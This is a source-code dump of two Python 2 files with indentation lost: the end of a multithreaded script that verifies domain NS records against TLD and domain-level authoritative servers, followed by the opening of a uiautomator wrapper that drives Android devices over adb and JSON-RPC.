if '.' in tld: # for a multi-level TLD, return the last label
return tld.split('.')[-1]
else:
return tld
def fetch_tld_ns():
"""
Fetch the IP addresses of the TLD authoritative (NS) servers.
"""
tld_ns = defaultdict(set)
try:
db = MySQL(SOURCE_CONFIG)
sql = 'SELECT tld,server_ipv4 from tld_ns_zone'
db.query(sql)
tld_ns_query = db.fetch_all_rows() # fetch the stored TLD authoritative server info
except Exception as e:
logger.logger.error("Failed to fetch TLD NS info: %s" % str(e))
return tld_ns
db.close()
for i in tld_ns_query:
tld = str(i['tld'])
if i['server_ipv4']:
ipv4 = str(i['server_ipv4']).split(';')
for ip in ipv4:
for p in ip.split(','):
if p:
tld_ns[tld].add(p)
return tld_ns
def update_domain_ns_db(id):
"""Insert or update the fetched domain NS data."""
# assemble the key fields
global domain_ns_result
ns_result = []
try:
db = MySQL(SOURCE_CONFIG)
except:
logger.logger.error("Database connection failed")
return
for domain in domain_ns_result:
v = domain_ns_result[domain]
domain_ns = ','.join(v[0])
ns_md5 = hashlib.md5(domain_ns).hexdigest()
tld_ns = ','.join(v[1])
ns_ns = ','.join(v[2])
invalid_ns = ','.join(v[3])
unknown_ns = ','.join(v[4])
verify_strategy = v[5]
insert_time = v[6]
ns_result.append((domain,ns_md5,domain_ns,tld_ns,ns_ns,invalid_ns,unknown_ns,verify_strategy,insert_time,id))
ns_sql = 'INSERT INTO domain_valid_ns (domain,ns_md5,domain_ns,tld_ns,ns_ns,invalid_ns,unknown_ns,verify_strategy,insert_time,task_id) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s) \
ON DUPLICATE KEY UPDATE ns_md5 = VALUES (ns_md5),domain_ns=VALUES(domain_ns),tld_ns=VALUES (tld_ns),ns_ns = VALUES (ns_ns),invalid_ns=VALUES (invalid_ns), \
unknown_ns=VALUES (unknown_ns), verify_strategy=VALUES (verify_strategy),insert_time = VALUES (insert_time),task_id = VALUES (task_id)' # update if the row exists, insert otherwise
try:
db.update_many(ns_sql, ns_result)
except Exception as e:
logger.logger.error("Failed to update domain NS records: " + str(e))
db.close()
def create_queue(domains, main_domains):
"""
Build the task queue for the first probe.
"""
for i, d in enumerate(domains):
queue.put((d,main_domains[i]))
def create_retry_queue(retry_domains):
"""
Build the task queue for the second (retry) probe.
"""
for domain,main_domain in retry_domains:
queue.put((domain,main_domain))
def obtain_domain_ns_by_tld(domain, tld_ns):
"""
Query the TLD authoritative servers for the domain's NS records, using
sub-threads to speed up probing.
:param
domain: string, the domain to resolve
tld_ns: dict, the set of TLD authoritative server IP addresses
:return
domain_ns: the set of authoritative server names for the domain
is_retry: true/false; true means the domain must be probed again
"""
is_retry = True # whether to probe again; no retry if any TLD server returned NS or the domain does not exist
status = []
tld = extract_domain_tld(domain) # get the TLD of the domain to query
if not tld:
logger.logger.warning("No TLD found for domain: %s" % domain)
return [], False # malformed domain: nothing to probe, no retry (callers unpack two values)
tld_ns_set = tld_ns.get(tld) # IP addresses of the TLD authoritative servers
if not tld_ns_set:
logger.logger.warning("No authoritative servers known for TLD: %s" % tld)
return [], False # no TLD servers available: cannot probe
sub_thread = [] # thread list
domain_ns = []
for ip in tld_ns_set:
t = NSubThread(get_domain_ns_hierarchical_dns, args=(domain, True, ip)) # one sub-thread per TLD authoritative server IP
sub_thread.append(t)
t.start()
for t in sub_thread:
t.join()
ns, ns_status = t.get_result()
status.append(ns_status)
if ns_status == 'TRUE':
domain_ns.extend(ns[1])
is_retry = False # the domain has valid NS records, no need to probe again
elif ns_status == 'NOEXSIT': # the domain does not exist, no need to probe again
is_retry = False
return list(set(domain_ns)), is_retry
def obtaining_domain_ns_by_ns(domain,main_domain, tld_domain_ns):
"""
Query the domain's own authoritative servers for NS records and collect the results.
:param string domain: the original domain to resolve
:param string main_domain: the main (registered) domain
:param list tld_domain_ns: NS server names for the domain as resolved via the TLD
:return list domain_ns: the set of validated, effective NS names for the domain
"""
domain_ns = [] # validated, effective NS names for the domain
sub_thread = [] # sub-thread list
tld_domain_valid_ns = [] # NS names from the TLD servers that resolved successfully
tld_domain_valid_ns_dict = {} # maps each responding NS to its response content
tld_domain_invalid_ns = [] # NS names from the TLD servers that failed to resolve
ns_domain_invalid_ns = []
ns_domain_ns = [] # NS names returned by the domain's own authoritative servers
unknown_ns = [] # NS names that could not be classified
# spawn the sub-threads
for n in tld_domain_ns:
t = NSubThread(query_domain_ns_by_ns, args=(main_domain, n))
sub_thread.append(t)
t.setDaemon(True)
t.start()
# collect the NS records held by the domain's authoritative servers
for t in sub_thread:
t.join()
ns, ns_status, original_ns = t.get_result()
if ns_status == 'TRUE':
ns_domain_ns.extend(ns)
tld_domain_valid_ns.append(original_ns)
tld_domain_valid_ns_dict[original_ns] = ns
else:
tld_domain_invalid_ns.append(original_ns)
ns_domain_ns = list(set(ns_domain_ns)) # dedupe
if not tld_domain_valid_ns: # no valid NS: return empty and stop
verify_strategy = 1
is_retry = True
return domain_ns,tld_domain_ns,ns_domain_ns,list(set(ns_domain_invalid_ns+tld_domain_invalid_ns)),unknown_ns, verify_strategy, is_retry # no valid tld_ns, so probe again
ns_domain_del_ns = list(set(ns_domain_ns)-set(tld_domain_invalid_ns)) # drop NS names from the domain servers that failed to resolve
is_same = set(tld_domain_valid_ns) == set(ns_domain_del_ns) # are the valid NS sets at both levels identical?
# if identical, return the correct names directly
if is_same:
domain_ns = tld_domain_valid_ns # the domain's effective NS
verify_strategy = 2
is_retry = False
return domain_ns, tld_domain_ns, ns_domain_ns, list(
set(ns_domain_invalid_ns + tld_domain_invalid_ns)), unknown_ns, verify_strategy, is_retry
# if they differ, analyse further
intersection_ns = set(tld_domain_valid_ns).intersection(set(ns_domain_del_ns)) # intersection of the upper- and lower-level NS sets
# print intersection_ns
if intersection_ns: # the intersection is non-empty
is_retry = False
domain_ns.extend(intersection_ns) # the intersected NS are treated as valid
verify_strategy = 3
# check records that exist only in the domain's own NS results
only_ns = list(set(ns_domain_ns).difference(intersection_ns))
for n in only_ns:
ns, ns_status, _ = query_domain_ns_by_ns(main_domain, n) # ask the domain's authoritative NS for the domain's NS records
if ns_status == 'TRUE': # resolves normally
if set(ns).intersection(set(domain_ns)): # intersects the common NS set, so judged valid
domain_ns.append(n)
else:
flag = verify_ns_by_ip(domain,n,domain_ns)
if flag == 1:
domain_ns.append(n)
elif flag == 0:
ns_domain_invalid_ns.append(n)
else:
unknown_ns.append(n)
else: # cannot be resolved, so it is an invalid NS
ns_domain_invalid_ns.append(n)
# check records that exist only on the TLD authoritative servers
only_tld = list(set(tld_domain_valid_ns).difference(intersection_ns))
for n in only_tld:
ns = tld_domain_valid_ns_dict.get(n)
if set(ns).intersection(set(domain_ns)):
domain_ns.append(n)
else:
flag = verify_ns_by_ip(domain, n, domain_ns)
if flag == 1:
domain_ns.append(n)
elif flag == 0:
tld_domain_invalid_ns.append(n)
else:
unknown_ns.append(n)
else: # the NS sets from the two levels do not overlap at all
verify_strategy = 4
is_retry = True
logger.logger.info("Domain %s: no NS intersection between the two levels" % domain)
if ns_domain_del_ns: # the domain-level NS set is non-empty
tld_ip, tld_cname = [], []
tld_ip_dict, tld_cname_dict = {}, {}
for n in tld_domain_valid_ns:
ipv4, cnames, ip_cname_status = query_ip_cname_by_ns(domain,n)
if ip_cname_status == 'TRUE' and (ipv4 or cnames):
tld_ip.extend(ipv4)
tld_cname.extend(cnames)
tld_ip_dict[n] = ipv4
tld_cname_dict[n] = cnames
ns_ip, ns_cname = [],[]
ns_ip_dict, ns_cname_dict = {}, {}
for n in ns_domain_del_ns:
ipv4, cnames, ip_cname_status = query_ip_cname_by_ns(domain, n)
if ip_cname_status == 'TRUE' and (ipv4 or cnames):
ns_ip.extend(ipv4)
ns_cname.extend(cnames)
ns_ip_dict[n] = ipv4
ns_cname_dict[n] = cnames
if not (ns_ip or ns_cname) and (tld_ip or tld_cname): # domain NS returned no IPs, TLD returned some
for n in tld_ip_dict:
domain_ns.append(n)
elif (ns_ip or ns_cname) and not (tld_ip or tld_cname): # domain NS returned IPs, TLD returned none
for n in ns_ip_dict:
domain_ns.append(n)
elif (ns_ip or ns_cname) and (tld_ip or tld_cname): # both levels returned answers
for n in tld_ip_dict:
if set(tld_ip_dict[n]).intersection(set(ns_ip)) or set(tld_cname_dict[n]).intersection(set(ns_cname)):
domain_ns.append(n)
else:
unknown_ns.append(n)
# print "无操作,修改程序"
for n in ns_ip_dict:
if set(ns_ip_dict[n]).intersection(set(tld_ip)) or set(ns_cname_dict[n]).intersection(
set(tld_cname)):
domain_ns.append(n)
else:
# print "无操作,修改程序"
unknown_ns.append(n)
else: # the domain-level NS set is empty
for n in tld_domain_valid_ns: # keep NS that return an IP or CNAME
ipv4, cnames, ip_cname_status = query_ip_cname_by_ns(domain, n)
if ip_cname_status == 'TRUE' and (ipv4 or cnames):
domain_ns.append(n)
else:
tld_domain_invalid_ns.append(n)
domain_ns.sort()
invalid_ns = list(set(ns_domain_invalid_ns + tld_domain_invalid_ns))
return domain_ns, tld_domain_ns, ns_domain_ns, invalid_ns, unknown_ns, verify_strategy,is_retry
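# Summary of the verify_strategy codes used above (added for clarity):
#   0 - nothing was obtained from the TLD servers (set by the caller)
#   1 - no TLD-level NS resolved successfully
#   2 - the TLD-level and domain-level NS sets are identical
#   3 - the two levels partially overlap; the extras are verified one by one
#   4 - the two levels do not overlap; NS are judged by their IP/CNAME answers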
def master_control(tld_ns):
"""Main worker loop for probing domains from the queue."""
global domain_ns_result
global retry_domains
while queue.qsize():
logger.logger.info('Live threads: %s, remaining tasks: %s' % (threading.activeCount(),queue.qsize()))
domain, main_domain = queue.get()
print domain, main_domain
ns_by_tld, is_retry = obtain_domain_ns_by_tld(main_domain, tld_ns) # fetch the domain's NS via the TLD authoritative servers
# print ns_by_tld, is_retry
if ns_by_tld:
domain_ns,tld_domain_ns,ns_domain_ns,invalid_ns, unknown_ns, verify_strategy,is_retry = obtaining_domain_ns_by_ns(domain,main_domain, ns_by_tld)
if is_retry and not domain_ns: # retry only when flagged and no valid NS was found
retry_domains.append((domain, main_domain))
# ns_md5 = hashlib.md5(domain_ns).hexdigest()
else:
if is_retry:
retry_domains.append((domain, main_domain))
domain_ns, tld_domain_ns, ns_domain_ns, invalid_ns, unknown_ns, verify_strategy = [], [], [], [], [], 0 # verify_strategy=0 means nothing was obtained from the TLD
insert_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
domain_ns_result[domain] = (domain_ns, tld_domain_ns, ns_domain_ns, invalid_ns, unknown_ns, verify_strategy, insert_time)
# time.sleep(1)
queue.task_done()
def verify_ns_by_ip(domain, ns, intersection_ns):
"""
Verify whether an NS is valid by comparing resolved IP/CNAME answers.
:param string domain: the domain to verify
:param string ns: the NS to verify
:param list intersection_ns: the already-confirmed valid NS set
:return: int flag: 1/0/-1 meaning valid/invalid/unknown
"""
ipv4, cnames, ip_cname_status = query_ip_cname_by_ns(domain, ns)
verify_result = []
if ip_cname_status == 'TRUE' and (ipv4 or cnames):
for n in intersection_ns:
n_ipv4, n_cnames, n_ip_cname_status = query_ip_cname_by_ns(domain, n)
if n_ip_cname_status == 'TRUE':
if set(ipv4).intersection(set(n_ipv4)) or set(cnames).intersection(set(n_cnames)):
verify_result.append(1)
break # intersection found, stop
else:
verify_result.append(-1) # has IP addresses, but no intersection
else:
verify_result.append(0)
else:
verify_result.append(0)
if 1 in verify_result:
return 1
elif -1 in verify_result:
return -1
else:
return 0
def save_to_file(id):
"""
Save the validated NS records to a local file.
:param id: task id, used in the output file name
:return: the output file name on success, False on failure
"""
global domain_ns_result
insert_time = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
path = './verified_domain_data/'
file_name = id+'_'+ insert_time
try:
fp = open(path+file_name,'w')
for domain in domain_ns_result:
domain_ns = domain_ns_result[domain][0]
domain_ns = ','.join(domain_ns)
if domain_ns:
fp.write(domain+'\t'+'NS'+'\t'+domain_ns+'\n')
fp.close()
return file_name
except Exception as e:
print e
return False
def read_domain_ns(file_name):
path = './verified_domain_data/'
with open(path+file_name,'r') as fp:
domain_ns = fp.read()
return domain_ns
def first_obtaining_domain_ns(domains,main_domains,tld_ns):
"""
First pass: fetch the valid NS records for the domains.
"""
create_queue(domains,main_domains)
worker_list = []
for q in range(thread_num): # start the workers
worker = Thread(target=master_control,args=(tld_ns,))
worker.setDaemon(True)
worker.start()
worker_list.append(worker)
queue.join()
def retry_obtaining_domain_ns(tld_ns):
"""
Probe again the domains whose NS records were not obtained on the first pass.
"""
global retry_domains
if not retry_domains:
return
print 'Number of domains to re-probe:', len(retry_domains), retry_domains
create_retry_queue(retry_domains)
worker_list = []
for q in range(retry_thread_num): # start the workers
worker = Thread(target=master_control, args=(tld_ns,))
worker.setDaemon(True)
worker.start()
worker_list.append(worker)
queue.join()
def obtaining_domain_ns(file_name,id):
"""Main entry point."""
logger.logger.info('Start resolving domain NS records; thread count: %s' % thread_num)
tld_ns = fetch_tld_ns()
domains, main_domains = read_domains(file_name)
# if insert_domains_db(domains):
# logger.logger.info("Domains successfully written to the database")
# else:
# logger.logger.info('Failed to write domains to the database')
first_obtaining_domain_ns(domains, main_domains, tld_ns)
retry_obtaining_domain_ns(tld_ns)
if domain_ns_result:
# update the database and the file; this could also be done with two sub-threads
logger.logger.info('Updating database...')
update_domain_ns_db(id)
logger.logger.info('Database update finished')
logger.logger.info('Saving to file...')
file_name = save_to_file(id)
logger.logger.info('File save finished')
for _ in range(3): # retry up to three times
domain_ns = read_domain_ns(file_name)
flag = TaskConfirm(file_name,domain_ns,'query',id).task_confirm() # send the probe-finished confirmation
if isinstance(flag, bool): # stop sending on success
break
else:
logger.logger.error('Real-time NS probing: probe confirmation failed: %s' % flag)
logger.logger.info('Finished resolving domain NS records; thread count: %s' % thread_num)
def main():
# file_name = '../domain_data/domains_201907011111'
file_name = '../domain_data/top500.txt'
file_name = '../domain_data/test2.txt'
obtaining_domain_ns(file_name,'4')
# while True:
# obtaining_domain_ns()
# time.sleep(60)
if __name__ == '__main__':
file_name = sys.argv[1]
id = sys.argv[2]
obtaining_domain_ns(file_name, id)
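# Usage (added note): run with a domain list file name and a task id, e.g.
#   python obtaining_domain_ns_realtime.py domains.txt 4
# where domains.txt is only a placeholder name; read_domains() loads it from
# ./unverified_domain_data/<file_name>.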
|
__init__.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Python wrapper for Android uiautomator tool."""
import sys
import os
import traceback
import subprocess
import time
import base64
import itertools
import json
import hashlib
import socket,threading
import re,tempfile
import collections
import xml.dom.minidom
from functools import wraps
from imgUtil import ImageUtil
from comparison import isMatch, getMatchedCenterOffset
from chromdriver import ChromeDriver
try:
import urllib2
except ImportError:
import urllib.request as urllib2
try:
from httplib import HTTPException
except:
from http.client import HTTPException
try:
if os.name == 'nt':
import urllib3
except: # to fix python setup error on Windows.
pass
# Set default logging handler to avoid "No handler found" warnings.
import logging
__author__ = "Xiaocong He"
__all__ = ["device", "Device", "rect", "point", "Selector", "JsonRPCError"]
logger = logging.getLogger('auto_runner')
if len(logger.handlers) == 0:
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(message)s'))
logger.addHandler(handler)
logger.setLevel(logging.INFO)
DEVICE_PORT = int(os.environ.get('UIAUTOMATOR_DEVICE_PORT', '9008'))
LOCAL_PORT = int(os.environ.get('UIAUTOMATOR_LOCAL_PORT', '9008'))
if 'localhost' not in os.environ.get('no_proxy', ''):
os.environ['no_proxy'] = "localhost,%s" % os.environ.get('no_proxy', '')
u2_version_code=21
reload(sys)
sys.setdefaultencoding('utf-8')
def U(x):
if sys.version_info.major == 2:
return x.decode('utf-8') if type(x) is str else x
elif sys.version_info.major == 3:
return x
def param_to_property(*props, **kwprops):
if props and kwprops:
raise SyntaxError("Cannot set both props and kwprops at the same time.")
class Wrapper(object):
def __init__(self, func):
self.func = func
self.kwargs, self.args = {}, []
def __getattr__(self, attr):
if kwprops:
for prop_name, prop_values in kwprops.items():
if attr in prop_values and prop_name not in self.kwargs:
self.kwargs[prop_name] = attr
return self
elif attr in props:
self.args.append(attr)
return self
raise AttributeError("%s parameter is duplicated or not allowed!" % attr)
def __call__(self, *args, **kwargs):
if kwprops:
kwargs.update(self.kwargs)
self.kwargs = {}
return self.func(*args, **kwargs)
else:
new_args, self.args = self.args + list(args), []
return self.func(*new_args, **kwargs)
return Wrapper
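# Illustrative sketch (added): param_to_property turns chained attribute
# access into keyword arguments. A hypothetical decorated function:
#
#   @param_to_property(action=['click', 'longClick'])
#   def gesture(action=None, **kwargs):
#       return action
#
#   # gesture.click() now calls gesture(action='click')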
def stopUiautomator(url):
port = url.split(":")[2].split("/")[0]
serial = None
try:
lines = systemCmd(['adb','forward','--list']).communicate()[0].decode("utf-8").strip().splitlines()
for s, lp, rp in [line.strip().split() for line in lines]:
if lp == 'tcp:%s'%port and rp=='tcp:9008':
serial = s
break
except:
pass
if serial:
os.system("adb -s %s shell am force-stop com.github.uiautomator"%serial)
def systemCmd(cmd_line):
'''Execute a system command; cmd_line is a list of arguments.'''
if os.name != "nt":
cmd_line = [" ".join(cmd_line)]
return subprocess.Popen(cmd_line, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
class JsonRPCError(Exception):
def __init__(self, code, message):
self.code = int(code)
self.message = message
def __str__(self):
return "JsonRPC Error code: %d, Message: %s" % (self.code, self.message)
class JsonRPCMethod(object):
if os.name == 'nt':
try:
pool = urllib3.PoolManager()
except:
pass
def __init__(self, url, method, timeout=30):
self.url, self.method, self.timeout = url, method, timeout
def __call__(self, *args, **kwargs):
if args and kwargs:
raise SyntaxError("Could not accept both *args and **kwargs as JSONRPC parameters.")
data = {"jsonrpc": "2.0", "method": self.method, "id": self.id()}
if args:
data["params"] = args
elif kwargs:
data["params"] = kwargs
params = data.get('params')[0] if data.get('params') else ""
if params:
try:
params = json.dumps({'params':params},ensure_ascii=False)
except:
params = str(params)
logger.info('exec u2 cmd: %s %s'%(self.method, params))
result = None
if os.name == "nt":
res = self.pool.urlopen("POST",
self.url,
headers={"Content-Type": "application/json"},
body=json.dumps(data).encode("utf-8"),
timeout=self.timeout)
content_type = res.headers['Content-Type']
result = res.data
else:
res = None
try:
req = urllib2.Request(self.url,
json.dumps(data).encode("utf-8"),
{"Content-type": "application/json"})
res = urllib2.urlopen(req, timeout=self.timeout)
content_type = res.info().getheader('Content-Type')
result = res.read()
finally:
if res is not None:
res.close()
if self.method == "screenshot":
if content_type == "image/png":
return result
jsonresult = json.loads(result.decode("utf-8"))
if "error" in jsonresult and jsonresult["error"]:
raise JsonRPCError(
jsonresult["error"]["code"],
"%s: %s" % (jsonresult["error"]["data"]["exceptionTypeName"], jsonresult["error"]["message"])
)
return jsonresult["result"]
def id(self):
m = hashlib.md5()
m.update(("%s at %f" % (self.method, time.time())).encode("utf-8"))
# m.update("i am uiautomator".encode("utf-8"))
return m.hexdigest()
class JsonRPCClient(object):
def __init__(self, url, timeout=30, method_class=JsonRPCMethod):
self.url = url
self.timeout = timeout
self.method_class = method_class
def __getattr__(self, method):
return self.method_class(self.url, method, timeout=self.timeout)
class Selector(dict):
"""This class builds the parameters for a UiSelector passed to the Android device.
"""
__fields = {
"text": (0x01, None), # MASK_TEXT,
"textContains": (0x02, None), # MASK_TEXTCONTAINS,
"textMatches": (0x04, None), # MASK_TEXTMATCHES,
"textStartsWith": (0x08, None), # MASK_TEXTSTARTSWITH,
"className": (0x10, None), # MASK_CLASSNAME
"classNameMatches": (0x20, None), # MASK_CLASSNAMEMATCHES
"description": (0x40, None), # MASK_DESCRIPTION
"descriptionContains": (0x80, None), # MASK_DESCRIPTIONCONTAINS
"descriptionMatches": (0x0100, None), # MASK_DESCRIPTIONMATCHES
"descriptionStartsWith": (0x0200, None), # MASK_DESCRIPTIONSTARTSWITH
"checkable": (0x0400, False), # MASK_CHECKABLE
"checked": (0x0800, False), # MASK_CHECKED
"clickable": (0x1000, False), # MASK_CLICKABLE
"longClickable": (0x2000, False), # MASK_LONGCLICKABLE,
"scrollable": (0x4000, False), # MASK_SCROLLABLE,
"enabled": (0x8000, False), # MASK_ENABLED,
"focusable": (0x010000, False), # MASK_FOCUSABLE,
"focused": (0x020000, False), # MASK_FOCUSED,
"selected": (0x040000, False), # MASK_SELECTED,
"packageName": (0x080000, None), # MASK_PACKAGENAME,
"packageNameMatches": (0x100000, None), # MASK_PACKAGENAMEMATCHES,
"resourceId": (0x200000, None), # MASK_RESOURCEID,
"resourceIdMatches": (0x400000, None), # MASK_RESOURCEIDMATCHES,
"index": (0x800000, 0), # MASK_INDEX,
"instance": (0x01000000, 0) # MASK_INSTANCE,
}
__mask, __childOrSibling, __childOrSiblingSelector = "mask", "childOrSibling", "childOrSiblingSelector"
def __init__(self, **kwargs):
super(Selector, self).__setitem__(self.__mask, 0)
super(Selector, self).__setitem__(self.__childOrSibling, [])
super(Selector, self).__setitem__(self.__childOrSiblingSelector, [])
for k in kwargs:
self[k] = kwargs[k]
def __setitem__(self, k, v):
if k in self.__fields:
super(Selector, self).__setitem__(U(k), U(v))
super(Selector, self).__setitem__(self.__mask, self[self.__mask] | self.__fields[k][0])
else:
raise ReferenceError("%s is not allowed." % k)
def __delitem__(self, k):
if k in self.__fields:
super(Selector, self).__delitem__(k)
super(Selector, self).__setitem__(self.__mask, self[self.__mask] & ~self.__fields[k][0])
def clone(self):
kwargs = dict((k, self[k]) for k in self
if k not in [self.__mask, self.__childOrSibling, self.__childOrSiblingSelector])
selector = Selector(**kwargs)
for v in self[self.__childOrSibling]:
selector[self.__childOrSibling].append(v)
for s in self[self.__childOrSiblingSelector]:
selector[self.__childOrSiblingSelector].append(s.clone())
return selector
def child(self, **kwargs):
self[self.__childOrSibling].append("child")
self[self.__childOrSiblingSelector].append(Selector(**kwargs))
return self
def sibling(self, **kwargs):
self[self.__childOrSibling].append("sibling")
self[self.__childOrSiblingSelector].append(Selector(**kwargs))
return self
child_selector, from_parent = child, sibling
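# Usage sketch (added; not part of the original module): Selector combines
# UiSelector fields and can be nested via child()/sibling():
#
#   s = Selector(text='OK', clickable=True).child(className='android.widget.Button')
#   # AutomatorDevice.__call__ builds the same thing: d(text='OK', clickable=True)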
def rect(top=0, left=0, bottom=100, right=100):
return {"top": top, "left": left, "bottom": bottom, "right": right}
def intersect(rect1, rect2):
top = rect1["top"] if rect1["top"] > rect2["top"] else rect2["top"]
bottom = rect1["bottom"] if rect1["bottom"] < rect2["bottom"] else rect2["bottom"]
left = rect1["left"] if rect1["left"] > rect2["left"] else rect2["left"]
right = rect1["right"] if rect1["right"] < rect2["right"] else rect2["right"]
return left, top, right, bottom
def point(x=0, y=0):
return {"x": x, "y": y}
class Adb(object):
def __init__(self, serial=None, adb_server_host=None, adb_server_port=None):
self.__adb_cmd = None
self.default_serial = serial if serial else os.environ.get("ANDROID_SERIAL", None)
self.adb_server_host = str(adb_server_host if adb_server_host else 'localhost')
self.adb_server_port = str(adb_server_port if adb_server_port else '5037')
self.adbHostPortOptions = []
if self.adb_server_host not in ['localhost', '127.0.0.1']:
self.adbHostPortOptions += ["-H", self.adb_server_host]
if self.adb_server_port != '5037':
self.adbHostPortOptions += ["-P", self.adb_server_port]
def adb(self):
if self.__adb_cmd is None:
if "ANDROID_HOME" in os.environ:
filename = "adb.exe" if os.name == 'nt' else "adb"
adb_cmd = os.path.join(os.environ["ANDROID_HOME"], "platform-tools", filename)
if not os.path.exists(adb_cmd):
raise EnvironmentError(
"Adb not found in $ANDROID_HOME path: %s." % os.environ["ANDROID_HOME"])
else:
import distutils
if "spawn" not in dir(distutils):
import distutils.spawn
adb_cmd = distutils.spawn.find_executable("adb")
if adb_cmd:
adb_cmd = os.path.realpath(adb_cmd)
else:
raise EnvironmentError("$ANDROID_HOME environment not set.")
self.__adb_cmd = adb_cmd
return self.__adb_cmd
def cmd(self, *args, **kwargs):
'''adb command, add -s serial by default. return the subprocess.Popen object.'''
serial = self.device_serial()
if serial:
if " " in serial: # TODO how to include special chars on command line
serial = "'%s'" % serial
return self.raw_cmd(*["-s", serial] + list(args))
else:
return self.raw_cmd(*args)
def raw_cmd(self, *args):
'''adb command. return the subprocess.Popen object.'''
cmd_line = [self.adb()] + self.adbHostPortOptions + list(args)
if os.name != "nt":
cmd_line = [" ".join(cmd_line)]
logger.info('exec adb cmd: %s'%" ".join(cmd_line))
return subprocess.Popen(cmd_line, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def device_serial(self):
if not self.default_serial:
devices = self.devices()
if devices:
if len(devices):
self.default_serial = list(devices.keys())[0]
else:
raise EnvironmentError("no device found.")
else:
raise EnvironmentError("Device not attached.")
return self.default_serial
def devices(self):
'''get a dict of attached devices. key is the device serial, value is device name.'''
out = self.raw_cmd("devices").communicate()[0].decode("utf-8")
match = "List of devices attached"
index = out.find(match)
if index < 0:
raise EnvironmentError("adb is not working.")
return dict([s.split("\t") for s in out[index + len(match):].strip().splitlines() if s.strip()])
def forward(self, local_port, device_port):
'''adb port forward. return 0 if success, else non-zero.'''
return self.cmd("forward", "tcp:%s" % local_port, "tcp:%s" % device_port).wait()
def forward_localabstract(self,local_port, localabstract):
'''adb port forward. return 0 if success, else non-zero.'''
return self.cmd("forward", "tcp:%s" % local_port, localabstract).wait()
def forward_list(self):
'''adb forward --list'''
version = self.version()
if int(version[1]) <= 1 and int(version[2]) <= 0 and int(version[3]) < 31:
raise EnvironmentError("Low adb version.")
lines = self.raw_cmd("forward", "--list").communicate()[0].decode("utf-8").strip().splitlines()
return [line.strip().split() for line in lines]
def remove_forward_port(self,port):
self.cmd("forward", "--remove", "tcp:%s" % port).wait()
def version(self):
'''adb version'''
match = re.search(r"(\d+)\.(\d+)\.(\d+)", self.raw_cmd("version").communicate()[0].decode("utf-8"))
return [match.group(i) for i in range(4)]
def getVersionCode(self, packageName):
'''adb dumpsys package myPackageName'''
versionCode = 0
try:
out = self.cmd('shell','dumpsys', 'package', packageName).communicate()[0]
for line in out.strip().splitlines():
tmp = line.strip()
if tmp.startswith("versionCode="):
versionCode = int(tmp.split(" ")[0].split("=")[1])
break
except:
pass
return versionCode
def checkPackageStatus(self, packageName='com.github.uiautomator'): # the package may already be uninstalled; confirm the on-device file entity
try:
out = self.cmd('shell','dumpsys', 'package', packageName).communicate()[0]
for line in out.strip().splitlines():
tmp = line.strip()
if tmp.find('Unable to find package: %s'%packageName) == -1:
return True
except:
pass
return False
def current_app(self):
'''return packagename activity'''
out = self.cmd('shell','dumpsys', 'window', 'w').communicate()[0]
flag = False
packageName = None
for line in out.strip().splitlines():
if 'mCurrentFocus' in line:
current_info = line[:-1].split(" ")[4]
if "/" in current_info:
return (current_info.split('/')[0],current_info.split('/')[1])
else:
if current_info.split('/')[0] == "StatusBar":
return (current_info.split('/')[0],None)
else:
flag = True
packageName = current_info.split('/')[0]
if flag and "mFocusedApp" in line:
return (packageName, line[line.find(packageName)+len(packageName)+1:].split(" ")[0])
def start_app(self, package_activity):
'''start app'''
out = self.cmd('shell','am', 'start', package_activity).communicate()[0]
result = []
for line in out.strip().splitlines():
tmp = line.strip()
result.append(tmp)
return result
def shell(self, *args, **kwargs):
'''adb shell command'''
self.cmd(*['shell'] + list(args)).wait()
def force_stop(self, packageName):
'''force stop package'''
self.shell('am','force-stop', packageName)
def install(self, params, apkpath):
out = self.cmd('install', params, apkpath).communicate()[0].strip().splitlines()
return out
def stop_third_app(self, ignore_filter=["com.tencent.mm"]):
'''force stop third app'''
ignore_filter_target = ['com.github.uiautomator','com.github.uiautomator.test']
ignore_filter_target += ignore_filter
for line in self.cmd('shell','pm','list','package','-3').communicate()[0].strip().splitlines():
if 'package:' in line:
package_name = line[len('package:'):]
if not package_name in ignore_filter_target:
self.force_stop(package_name)
@property
def airplane_mode(self):
my_self = self
class _AirplaneMode(object):
def on(self):
my_self.shell('settings put global airplane_mode_on 1')
time.sleep(2)
my_self.shell('am broadcast -a android.intent.action.AIRPLANE_MODE --ez state true')
def off(self):
my_self.shell('settings put global airplane_mode_on 0')
time.sleep(2)
my_self.shell('am broadcast -a android.intent.action.AIRPLANE_MODE --ez state false')
return _AirplaneMode()
@property
def ime(self): # input method (IME) operations
myself = self
class IME(object):
def availables(self):
return filter(lambda x:True if x else False, myself.cmd('shell','ime','list','-s').communicate()[0].strip().splitlines())
def default(self):
return myself.cmd('shell','settings','get','secure','default_input_method').communicate()[0].strip().splitlines()
def enable(self, imeId):
myself.shell('ime', 'enable', imeId)
def disable(self, imeId):
myself.shell('ime', 'disable', imeId)
def set(self, imeId):
myself.shell('ime', 'set', imeId)
return IME()
_init_local_port = LOCAL_PORT - 1
def next_local_port(adbHost=None):
def is_port_listening(port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = s.connect_ex((str(adbHost) if adbHost else '127.0.0.1', port))
s.close()
return result == 0
global _init_local_port
_init_local_port = _init_local_port + 1 if _init_local_port < 32764 else LOCAL_PORT
while is_port_listening(_init_local_port):
_init_local_port += 1
return _init_local_port
class NotFoundHandler(object):
'''
Handler for UI Object Not Found exception.
It's a replacement for the UiAutomator watcher on the device side.
'''
def __init__(self):
self.__handlers = collections.defaultdict(lambda: {'on': True, 'handlers': []})
def __get__(self, instance, type):
return self.__handlers[instance.adb.device_serial()]
class AutomatorServer(object):
"""start and quit rpc server on device.
"""
__jar_files = {
"bundle.jar": "libs/bundle.jar",
"uiautomator-stub.jar": "libs/uiautomator-stub.jar"
}
__apk_files = ["libs/app-uiautomator.apk", "libs/app-uiautomator-test.apk"]
__sdk = 0
handlers = NotFoundHandler() # handler UI Not Found exception
def __init__(self, serial=None, local_port=None, device_port=None, adb_server_host=None, adb_server_port=None):
self.uiautomator_process = None
